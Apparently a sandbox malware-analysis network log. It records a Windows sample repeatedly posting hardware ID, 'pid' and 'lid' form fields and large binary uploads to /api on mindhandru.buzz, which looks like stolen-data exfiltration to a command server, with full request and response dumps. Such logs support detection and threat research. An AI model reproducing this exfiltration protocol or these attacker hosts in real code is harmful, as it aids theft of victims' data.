2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 39 74 79 78 51 44 2b 79 64 55 78 76 76 44 58 6d 77 7a 62 4e 58 53 6e 55 42 48 79 66 44 75 6e 47 55 53 54 44 52 31 62 4b 71 54 67 32 57 33 42 52 63 62 55 78 43 32 79 2b 74 44 54 47 4a 6f 71 4a 71 78 53 51 36 38 75 4c 2b 68 65 42 35 73 55 56 41 39 6e 6c 2b 37 4d 66 4d 51 44 2f 63 6a 48 50 62 2f 32 32 5a 6b 45 31 54 6c 76 72 46 59 45 39 48 78 70 71 52 63 44 6a 46 55 46 51 30 4f 56 39 63 64 74 67 68 69 35 32 34 63 38 74 62 65 45 30 77 50 65 50 47 4b 73 55 67 58 79 61 43 54 6d 57 41 57 55 47 6c 6b 49 59 35 54 6d 78 48 6a 50 41 2b 58 49 7a 44 53 31 2f 74 43 65 52 35 70 7a 59 62 4d 65 57 37 64 66 4a 4f 6c 5a 41 34 4a 56 51 6b 31 7a 30 75 44 46 50 5a 70 48 39 73 37 49 4f 4c 62 30 33 35 49 4e 78 69 46 71 6f 6c 59 47 2b 32 55 6e 34 55 55 43 6d 78 78 65 41 47 4f 56 Data Ascii: 9tyxQD+ydUxvvDXmwzbNXSnUBHyfDunGUSTDR1bKqTg2W3BRcbUxC2y+tDTGJoqJqxSQ68uL+heB5sUVA9nl+7MfMQD/cjHPb/22ZkE1TlvrFYE9HxpqRcDjFUFQ0OV9cdtghi524c8tbeE0wPePGKsUgXyaCTmWAWUGlkIY5TmxHjPA+XIzDS1/tCeR5pzYbMeW7dfJOlZA4JVQk1z0uDFPZpH9s7IOLb035INxiFqolYG+2Un4UUCmxxeAGOV
2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 49 57 38 4e 4f 48 59 36 2f 6e 79 35 51 59 6d 69 6f 6d 72 46 4a 44 72 79 34 76 37 6c 45 44 6b 68 74 50 42 6d 79 64 36 4d 42 30 78 67 2f 30 77 73 4d 2f 76 76 4c 66 6e 77 7a 54 4d 47 6d 76 56 77 33 2b 59 57 6d 70 46 77 4f 4d 56 51 56 44 53 34 6e 6b 78 58 43 43 47 4c 6e 62 68 7a 79 31 74 34 54 54 43 39 6f 32 5a 71 46 59 42 2f 4a 6f 49 2b 4a 58 44 35 63 61 57 51 56 75 6e 65 66 43 64 4d 4d 42 38 73 6a 4d 50 62 54 30 32 70 56 48 6d 6e 4e 68 73 78 35 62 74 30 34 79 36 6c 73 44 31 41 6f 54 47 69 71 56 36 34 6b 6c 67 67 7a 37 78 73 41 37 74 50 54 55 6c 67 50 65 4e 6d 61 6a 54 41 76 33 61 54 76 31 56 77 32 52 47 56 34 44 62 70 54 75 7a 33 37 47 52 37 6d 43 77 43 50 35 72 35 79 2b 43 39 4d 61 59 62 41 65 48 4c 6c 33 61 65 42 62 52 4d 78 56 58 41 68 67 6e 65 72 4b 65 Data Ascii: IW8NOHY6/ny5QYmiomrFJDry4v7lEDkhtPBmyd6MB0xg/0wsM/vvLfnwzTMGmvVw3+YWmpFwOMVQVDS4nkxXCCGLnbhzy1t4TTC9o2ZqFYB/JoI+JXD5caWQVunefCdMMB8sjMPbT02pVHmnNhsx5bt04y6lsD1AoTGiqV64klggz7xsA7tPTUlgPeNmajTAv3aTv1Vw2RGV4DbpTuz37GR7mCwCP5r5y+C9MaYbAeHLl3aeBbRMxVXAhgnerKe
2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 43 6e 77 4b 67 74 38 72 54 58 34 5a 39 4a 72 6b 65 57 37 63 70 4b 76 56 46 41 70 63 44 58 6b 52 55 72 4d 44 66 64 38 55 58 38 4e 58 49 65 2f 65 33 30 39 4e 66 37 58 4e 76 72 45 55 53 34 57 4d 35 34 42 63 37 32 6c 56 46 51 7a 4c 53 30 73 70 7a 7a 41 44 68 30 34 6f 63 72 2f 33 62 67 77 44 44 50 43 62 6c 48 67 57 33 4e 6e 71 70 46 77 43 46 56 51 56 54 4f 4d 6d 79 6d 69 71 53 56 65 69 4d 33 6e 75 76 74 34 54 42 53 5a 51 68 4a 76 4d 65 52 50 52 38 4f 2b 46 55 45 70 64 53 59 7a 31 4e 69 4f 72 50 61 74 4d 35 79 63 58 64 4e 72 2f 67 7a 64 38 53 31 7a 31 6f 72 45 68 44 75 53 34 6d 70 77 38 39 31 46 30 64 50 43 54 53 2f 34 6b 6c 67 6a 4c 30 7a 4d 6b 38 72 2b 61 52 74 42 33 5a 4e 58 47 36 48 6b 32 33 61 47 6d 2f 42 30 72 55 45 55 78 44 4d 73 4b 31 6b 69 69 52 55 4b Data Ascii: CnwKgt8rTX4Z9JrkeW7cpKvVFApcDXkRUrMDfd8UX8NXIe/e309Nf7XNvrEUS4WM54Bc72lVFQzLS0spzzADh04ocr/3bgwDDPCblHgW3NnqpFwCFVQVTOMmymiqSVeiM3nuvt4TBSZQhJvMeRPR8O+FUEpdSYz1NiOrPatM5ycXdNr/gzd8S1z1orEhDuS4mpw891F0dPCTS/4klgjL0zMk8r+aRtB3ZNXG6Hk23aGm/B0rUEUxDMsK1kiiRUK
2024-12-26 13:14:28 UTC	1369	IN	Data Raw: 68 38 6e 4a 6b 41 6e 61 4e 48 43 36 48 6b 32 33 59 57 6d 2f 62 6b 54 63 56 57 4a 4e 4b 6f 71 6e 6b 54 33 33 42 50 6e 4d 77 43 32 6f 75 76 75 64 41 4e 55 6c 64 72 78 52 51 37 6b 75 4c 36 63 50 56 74 70 56 57 52 49 71 79 72 65 62 4a 70 64 55 6f 4a 4b 56 4a 50 66 75 6e 49 56 48 6a 47 45 6f 36 30 78 44 72 79 35 75 35 45 55 57 6b 68 5a 4c 41 43 32 73 32 65 35 7a 78 51 62 68 30 74 41 30 39 74 6e 71 73 6a 6e 71 4a 6d 57 6c 55 41 54 68 66 32 6d 70 46 77 76 55 54 57 52 44 49 74 4c 59 68 7a 33 61 52 36 2b 43 38 6a 69 33 2b 64 75 46 46 70 6b 55 61 4b 78 66 46 65 64 35 4a 71 68 35 4d 72 56 56 45 30 4e 73 30 72 2b 62 4d 34 49 44 35 6f 4b 66 61 2b 75 73 69 63 42 51 68 47 46 35 35 55 64 44 34 53 35 78 74 52 6c 45 68 6c 55 46 51 79 32 52 39 64 74 37 77 52 48 30 68 66 6b Data Ascii: h8nJkAnaNHC6Hk23YWm/bkTcVWJNKoqnkT33BPnMwC2ouvudANUldrxRQ7kuL6cPVtpVWRIqyrebJpdUoJKVJPfunIVHjGEo60xDry5u5EUWkhZLAC2s2e5zxQbh0tA09tnqsjnqJmWlUAThf2mpFwvUTWRDItLYhz3aR6+C8ji3+duFFpkUaKxfFed5Jqh5MrVVE0Ns0r+bM4ID5oKfa+usicBQhGF55UdD4S5xtRlEhlUFQy2R9dt7wRH0hfk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:30 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5JRT1I78U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12798 Host: mindhandru.buzz
2024-12-26 13:14:30 UTC	12798	OUT	Data Raw: 2d 2d 35 4a 52 54 31 49 37 38 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 42 38 31 36 46 46 37 42 39 46 31 32 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 4a 52 54 31 49 37 38 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4a 52 54 31 49 37 38 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 4a 52 54 31 49 37 38 55 0d 0a 43 6f 6e 74 65 6e Data Ascii: --5JRT1I78UContent-Disposition: form-data; name="hwid"DCB816FF7B9F128FBEBA0C6A975F1733--5JRT1I78UContent-Disposition: form-data; name="pid"2--5JRT1I78UContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5JRT1I78UConten
2024-12-26 13:14:31 UTC	1136	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=df7l4mo8al5vab7l6rs8b6tbpa; expires=Mon, 21 Apr 2025 07:01:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Plc2avEfFMIfRAUI%2FAWFeCQIf2Qhlh6%2B6zbaVxM7%2FccbQKV%2Beq4u7HomW2trblYNDB3zV3OVV89%2Fy1ZhnRrq6PolR5vHW0NjKMrKH4su3PT8%2FAgYFRGbMBl89SwmeDhTn%2B8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f81559539c88cbf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1811&rtt_var=682&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13728&delivery_rate=1601755&cwnd=249&unsent_bytes=0&cid=714683d7c5db6004&ts=1019&x=0"
2024-12-26 13:14:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 13:14:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49707	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:33 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FZW62AOA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15021 Host: mindhandru.buzz
2024-12-26 13:14:33 UTC	15021	OUT	Data Raw: 2d 2d 46 5a 57 36 32 41 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 42 38 31 36 46 46 37 42 39 46 31 32 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 46 5a 57 36 32 41 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 5a 57 36 32 41 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 5a 57 36 32 41 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --FZW62AOAContent-Disposition: form-data; name="hwid"DCB816FF7B9F128FBEBA0C6A975F1733--FZW62AOAContent-Disposition: form-data; name="pid"2--FZW62AOAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--FZW62AOAContent-Di
2024-12-26 13:14:34 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sgdvav3kl477vua0l5oqela94h; expires=Mon, 21 Apr 2025 07:01:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzLYxiE4Cu8slAETDwpKi48UIdfuUK6k%2Ffco10V13qWp%2BYVWqVyb%2F25mj5VcjzSEZeBuRh1U6qKwOlEZeZfiYmGXGBozzZXQdCsQna%2FA7gYnmxiEr%2BIREfSKRyHHqiixfF4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8155a60c710caa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1477&rtt_var=565&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15950&delivery_rate=1917268&cwnd=239&unsent_bytes=0&cid=52ff1f2b2afbb030&ts=1173&x=0"
2024-12-26 13:14:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 13:14:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49708	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:35 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=A2HFS51AI7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20200 Host: mindhandru.buzz
2024-12-26 13:14:35 UTC	15331	OUT	Data Raw: 2d 2d 41 32 48 46 53 35 31 41 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 42 38 31 36 46 46 37 42 39 46 31 32 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 32 48 46 53 35 31 41 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 32 48 46 53 35 31 41 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 32 48 46 53 35 31 41 49 37 0d 0a 43 6f Data Ascii: --A2HFS51AI7Content-Disposition: form-data; name="hwid"DCB816FF7B9F128FBEBA0C6A975F1733--A2HFS51AI7Content-Disposition: form-data; name="pid"3--A2HFS51AI7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A2HFS51AI7Co
2024-12-26 13:14:35 UTC	4869	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2024-12-26 13:14:36 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f2ai4f3m9ih6lrag0jpc7k1ua5; expires=Mon, 21 Apr 2025 07:01:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dm592eY6dcjXvDSl6KliXsyNQljd%2BnBbSv2Nalps3UvohbglkILUGpEXwc4STTZeLs%2FjSwIGNi7sZXhDT7LLZ1GBcN7Dp1ddNxgLqcn%2BZSf0Wbvlv2X7PVjAI%2Fh7QL%2BY5GA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8155b77fc6425d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1685&rtt_var=654&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21153&delivery_rate=1644144&cwnd=193&unsent_bytes=0&cid=d75fc34013d28c39&ts=958&x=0"
2024-12-26 13:14:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 13:14:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49709	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:38 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SWUXHYGMI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1188 Host: mindhandru.buzz
2024-12-26 13:14:38 UTC	1188	OUT	Data Raw: 2d 2d 53 57 55 58 48 59 47 4d 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 42 38 31 36 46 46 37 42 39 46 31 32 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 53 57 55 58 48 59 47 4d 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 57 55 58 48 59 47 4d 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 53 57 55 58 48 59 47 4d 49 0d 0a 43 6f 6e 74 65 6e Data Ascii: --SWUXHYGMIContent-Disposition: form-data; name="hwid"DCB816FF7B9F128FBEBA0C6A975F1733--SWUXHYGMIContent-Disposition: form-data; name="pid"1--SWUXHYGMIContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--SWUXHYGMIConten
2024-12-26 13:14:39 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bdloks7jbn0rtqt9al43v1m9qi; expires=Mon, 21 Apr 2025 07:01:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHQ8vtq8suF7i5gAyaZGkXcfH6bvg61u0JfZqqaZDSBjPTk2EytnzPSZzRuBqcBpYQBZwBjd1sY1esZettLTMNwNfRbaUBaiC6IXjmG4%2FQv5tgZqMDltX%2BnWXU2gfd5XoJI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8155caef3d3350-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1778&rtt_var=682&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2095&delivery_rate=1586956&cwnd=173&unsent_bytes=0&cid=144c0b48a3c7f0d4&ts=837&x=0"
2024-12-26 13:14:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 13:14:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49713	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:42 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=05RQOLM4I9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 571992 Host: mindhandru.buzz
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 2d 2d 30 35 52 51 4f 4c 4d 34 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 42 38 31 36 46 46 37 42 39 46 31 32 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 35 52 51 4f 4c 4d 34 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 35 52 51 4f 4c 4d 34 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 35 52 51 4f 4c 4d 34 49 39 0d 0a 43 6f Data Ascii: --05RQOLM4I9Content-Disposition: form-data; name="hwid"DCB816FF7B9F128FBEBA0C6A975F1733--05RQOLM4I9Content-Disposition: form-data; name="pid"1--05RQOLM4I9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--05RQOLM4I9Co
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 51 1d a6 4a f0 4b b5 91 c9 f7 31 35 3c fe 13 42 4a bb 65 7d 9c b9 50 cc 28 94 f0 62 79 4a 9d 37 bd ff 1e b5 da 42 41 6b 18 96 ef 2d 05 36 ee bc 9f a5 65 98 e2 53 98 79 4a da 66 73 a0 9b 12 ab c1 59 94 4b 5a 55 aa 1d 7d 93 e1 cb c9 17 22 93 68 88 3f 11 dc 90 5d fd 76 13 36 94 28 7c 1a 6e 84 85 fd 7f 41 ec cd 8f a2 ca 9f d5 6a 06 44 f2 40 e2 d2 18 73 f2 f3 25 be af 4a 49 5d 58 6e c3 07 f5 0b 48 40 43 a5 78 a1 5f 49 68 41 2d 03 a5 93 93 5d e2 f7 fa 42 18 b2 bf 6d 17 b3 69 5a a1 bd f5 80 3f ad 8f 99 53 e3 a6 14 72 96 15 d9 62 1b 4b 26 ed 0f d4 79 9f a7 35 c7 94 dd c1 57 c8 2a 86 8c 58 72 70 62 cb be 11 ba 34 44 76 84 d7 b9 b5 5e 93 b8 64 24 e8 6f 47 45 a9 83 89 67 7f 80 ee 77 c3 97 a4 c4 7b 66 69 90 ac 23 dc 3f 64 52 6f f8 38 98 34 04 bd c0 4e a5 e2 61 e0 b1 Data Ascii: QJK15<BJe}P(byJ7BAk-6eSyJfsYKZU}"h?]v6(\|nAjD@s%JI]XnH@Cx_IhA-]BmiZ?SrbK&y5W*Xrpb4Dv^d$oGEgw{fi#?dRo84Na
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 5f 78 d8 7c a6 10 a9 5a 77 79 57 67 35 dd b9 45 4c f3 cf a6 b2 4b a7 a7 54 8e 18 13 08 3b bc de 6b 25 90 56 d2 86 ee 06 de ee a7 c7 29 08 26 df 85 8c 34 50 aa 85 6a 9d 6e 0f 7b cd 0e 45 07 14 05 47 c5 04 39 23 90 d5 24 4c 33 c2 b2 29 bc 94 80 61 49 f6 3c 6a 5b 55 4b be 5b 67 32 88 f4 6f c2 d5 46 bb cc e7 f1 dc c7 15 a2 10 b2 4a b7 7b 9e 49 11 20 8c 29 3b d2 a3 42 e3 d6 df 7c f6 de 12 56 a6 be f6 39 d4 07 bd 7d b4 7a 87 62 e9 66 d2 36 95 28 f8 c6 a4 ca 70 84 7d 6e 18 cb c4 6e fd 1e dd fa 47 53 82 d3 0e d4 56 75 db 2d cd fc f1 49 bd 21 e7 f7 7b 03 65 46 d7 3c 02 67 df be af fc f3 a0 84 cd 99 5e fe bc 72 b2 ce a0 86 43 d9 f3 8b 20 68 25 ad d6 c7 ae ad bc 3d 8d b2 b9 25 70 e6 75 36 6e 91 95 b5 5f d3 7f b4 a2 45 62 6c d6 e8 61 e5 d8 83 e7 f9 7c fd bd 23 de 98 Data Ascii: _x\|ZwyWg5ELKT;k%V)&4Pjn{EG9#$L3)aI<j[UK[g2oFJ{I );B\|V9}zbf6(p}nnGSVu-I!{eF<g^rC h%=%pu6n_Ebla\|#
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 98 d8 19 7f 3c 57 af f1 3c 37 e8 a4 45 8e f0 3f 54 e2 ba d2 68 33 26 a0 e3 a5 c9 84 6c b8 1b cd a0 70 74 ac 06 66 bf c2 78 f4 ea 52 80 63 7d 93 9a 61 c0 34 37 77 c8 d9 69 f7 47 c2 ac ec 55 e5 51 5e 19 53 b1 99 44 d5 58 f1 e2 b0 54 17 3b 3d b8 cd 6e ca bd 23 0e a5 02 e0 9d 29 4f 53 ed f3 be 90 8e e0 cd 75 1a 5b bc 83 65 be 98 30 e6 b9 b3 f2 e1 a7 6b 11 5e 5c 6a 90 e7 a4 2a 03 9c f6 aa ed 5b 7a bb 86 ed 0a 0d 8d e7 05 3b f2 e4 37 59 af c4 3e 20 ee 16 9c 91 22 1f 3a 82 a2 1e 97 82 c2 37 d6 07 9a bb e2 5f 1f 24 d3 24 37 e3 90 e0 5d 47 08 41 0c 30 cf 28 df 4b d3 62 e9 f3 fa 2a 9f fd a0 8f 8e ec 38 49 c3 82 cf 82 af ff f2 1a 75 db 48 01 d7 8b 46 e9 f4 1e 5a e1 2a 5d c0 f5 ef f1 cc 3c 3a bb 35 08 ba a7 f5 e5 7b 46 5f 07 47 67 73 a1 3b 07 d3 c9 09 62 86 ca 6b de Data 